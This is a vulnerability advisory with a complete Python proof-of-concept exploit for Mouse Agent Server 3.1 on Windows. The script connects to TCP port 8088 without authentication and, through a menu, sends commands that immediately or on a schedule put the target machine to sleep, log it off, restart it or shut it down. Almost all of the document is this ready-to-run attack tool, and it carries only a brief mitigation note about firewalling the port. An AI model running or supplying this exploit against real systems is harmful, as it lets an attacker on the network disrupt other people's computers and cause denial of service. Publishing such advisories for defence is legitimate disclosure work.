
📄 Mouse Agent Server 3.1 Unauthenticated Remote System Control

🗓️ 21 Jul 2025 00:00:00 · Reported by Chokri Hammedi · Type: packetstorm · 🔗 packetstorm.news

Mouse Agent Server version 3.1 on Windows accepts power commands (shutdown, restart, sleep, logoff) on TCP port 8088 without authentication, so a host on the same network can trigger them remotely.

Code
# Exploit Title: Mouse Agent Server v3.1 - Remote Power Control (Shutdown/Reboot/Logoff)
    # Date: 19/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.docs.kr/
    # Software Link: http://192.168.8.100:8080/ (iOS/Android Mobile App Interface)
    # Version: 3.1 (Windows)
    # Tested on: Windows 10 / Windows 11
    
    
    '''
    Description:
    
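    Mouse Agent Server v3.1 exposes a TCP control interface on port 8088 that
    accepts power commands (shutdown, restart, sleep, logoff) without
    authentication. An attacker on the same network can use this to disrupt
    the system remotely, with no user interaction. The handshake in the code
    below also handles a "LIN:PASS" password challenge, which suggests the
    server can be configured with a password; the unauthenticated case
    presumably applies when none is set. Until that is confirmed or a fix is
    available, restrict access to port 8088 (for example with the host
    firewall).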
    
    '''
    
    import socket
    import time
    
    
    class Colors:
        """ANSI escape sequences used to colour the script's status messages."""

        # Bright red foreground.
        RED = '\033[91m'
        # Bright yellow foreground.
        YELLOW = '\033[93m'
        # Reset all terminal attributes.
        END = '\033[0m'
    
    class MouseAgentController:
        """Minimal client for the Mouse Agent Server text protocol.

        Everything here is plain CRLF-terminated text over one TCP connection:
        a ``LIN:`` login exchange followed by ``SCD:`` power commands. The
        class shows what the service accepts from any peer that can reach its
        port, which is the exposure the advisory describes.
        """

        def __init__(self, host, port=8088, password=None):
            """Store the target address and optional password; no I/O happens here."""
            self.sock = None
            self.password = password
            self.port = port
            self.host = host

        def connect(self):
            """Open the TCP connection and run the ``LIN:`` login exchange.

            Returns True when the server does not ask for a password, or when
            it answers the supplied password with ``LIN:OK``. Returns False
            after printing a message when authentication fails or any
            exception is raised.
            """
            try:
                conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock = conn
                conn.settimeout(5)
                conn.connect((self.host, self.port))

                # An empty login is sent first; the reply tells us whether a
                # password is required at all.
                self._send_raw("LIN:")
                greeting = self._receive_response()
                if "LIN:PASS" not in greeting:
                    return True

                # Password challenge: prompt only when none was supplied.
                if not self.password:
                    self.password = input("Server requires password: ")
                self._send_raw(f"LIN:{self.password}")
                verdict = self._receive_response()
                if "LIN:OK" in verdict:
                    return True
                print("✖ Authentication failed")
                return False
            except Exception as err:
                print(f"✖ Connection error: {err}")
                return False

        def _send_raw(self, command):
            """Send one CRLF-terminated protocol line, then pause briefly."""
            wire = (command + "\r\n").encode()
            self.sock.sendall(wire)

            # Fixed 0.3 s pause after every line; presumably gives the server
            # time to process it -- the source does not say.
            time.sleep(0.3)

        def _receive_response(self):
            """Read up to 1024 bytes from the socket and return them as stripped text."""
            raw = self.sock.recv(1024)
            return raw.decode().strip()

        def send_power_command(self, action, minutes=0):
            """Send the ``SCD:`` line for *action*; return False if it is unknown.

            Every action except ``cancel`` carries a ``,<minutes>`` suffix.
            No reply is read back, so True only means the line was sent.
            """
            opcode = {
                "sleep": "SCD:SLP",
                "logoff": "SCD:LOF",
                "restart": "SCD:RST",
                "shutdown": "SCD:OFF",
                "cancel": "SCD:DEL"
            }.get(action)
            if opcode is None:
                return False

            suffix = "" if action == "cancel" else f",{minutes}"
            self._send_raw(opcode + suffix)
            return True

        def close(self):
            """Close the socket if one was opened."""
            if not self.sock:
                return
            self.sock.close()
    
    def get_time_input():
        """Prompt for hours and minutes until both are valid; return total minutes.

        Hours must be 0-23 and minutes 0-59. Non-numeric input and
        out-of-range values each print a message and restart the prompt.
        """
        while True:
            try:
                hrs = int(input("Enter hours (0-23): "))
                mins = int(input("Enter minutes (0-59): "))
            except ValueError:
                print("Please enter numbers only")
                continue

            if hrs not in range(24) or mins not in range(60):
                print("Please enter valid time (hours: 0-23, minutes: 0-59)")
                continue

            return hrs * 60 + mins
    
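    def main():
        """Interactive command-line front end for the proof of concept.

        Parses the target host, port (default 8088) and optional password,
        connects through MouseAgentController, then loops over a text menu
        until the user picks 0. The socket is always closed on the way out.

        Menu entries 1-4 and 9 send their command with a delay of 0; entries
        5-8 first ask for a delay through get_time_input(). The
        "~60 seconds" wording in the confirmations is the original author's
        and is not verified by anything in this script.
        """
        import argparse
        parser = argparse.ArgumentParser(description='MouseAgent Power Control')
        parser.add_argument('host', help='Server IP address')
        parser.add_argument('-p', '--port', type=int, default=8088,
                            help='Server port (default: 8088)')
        parser.add_argument('--password', help='Server password', default=None)
        args = parser.parse_args()

        controller = MouseAgentController(args.host, args.port, args.password)
        if not controller.connect():
            return

        # Menu key -> (action, delay in minutes or None to prompt, confirmation).
        # Built once, outside the loop. Each message is written as adjacent
        # literals so no string literal spans a line break; the listing's
        # hard wrap had split these strings and left the file unparseable.
        actions = {
            '1': ("sleep", 0,
                  f"{Colors.YELLOW}✓ Sleep command sent "
                  f"(executes in ~60 seconds){Colors.END}"),
            '2': ("logoff", 0,
                  f"{Colors.YELLOW}✓ Log off command sent "
                  f"(executes in ~60 seconds){Colors.END}"),
            '3': ("restart", 0,
                  f"{Colors.YELLOW}✓ Restart command sent "
                  f"(executes in ~60 seconds){Colors.END}"),
            '4': ("shutdown", 0,
                  f"{Colors.YELLOW}✓ Shutdown command sent "
                  f"(executes in ~60 seconds){Colors.END}"),
            # "{{}}" leaves a literal "{}" for the later str.format() call.
            '5': ("sleep", None,
                  f"{Colors.RED}✓ Sleep scheduled in {{}}{Colors.END}"),
            '6': ("logoff", None,
                  f"{Colors.RED}✓ Log off scheduled in {{}}{Colors.END}"),
            '7': ("restart", None,
                  f"{Colors.RED}✓ Restart scheduled in {{}}{Colors.END}"),
            '8': ("shutdown", None,
                  f"{Colors.RED}✓ Shutdown scheduled in {{}}{Colors.END}"),
            '9': ("cancel", 0,
                  f"{Colors.RED}✓ All scheduled actions cancelled{Colors.END}")
        }

        try:
            while True:
                print("\n=== MouseAgent Power Control ===")
                print("Immediate Actions:")
                print("[1] Sleep now       [2] Log off now")
                print("[3] Restart now     [4] Shutdown now")
                print("\nScheduled Actions:")
                print("[5] Schedule Sleep  [6] Schedule Log off")
                print("[7] Schedule Restart [8] Schedule Shutdown")
                print("\n[9] Cancel All Scheduled Actions")
                print("[0] Exit")

                choice = input("\nSelect option: ").strip()

                if choice == '0':
                    break

                if choice not in actions:
                    print("✖ Invalid choice")
                    continue

                action, minutes, msg = actions[choice]
                if minutes is None:
                    # Scheduled entry: ask for the delay, report it as "Xh Ym".
                    delay = get_time_input()
                    controller.send_power_command(action, delay)
                    print(msg.format(f'{delay//60}h {delay%60}m'))
                else:
                    controller.send_power_command(action, minutes)
                    print(msg)

        finally:
            controller.close()
            print("✓ Disconnected")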
    
    # Run the interactive menu only when the file is executed as a script,
    # not when it is imported.
    if __name__ == "__main__":
        main()
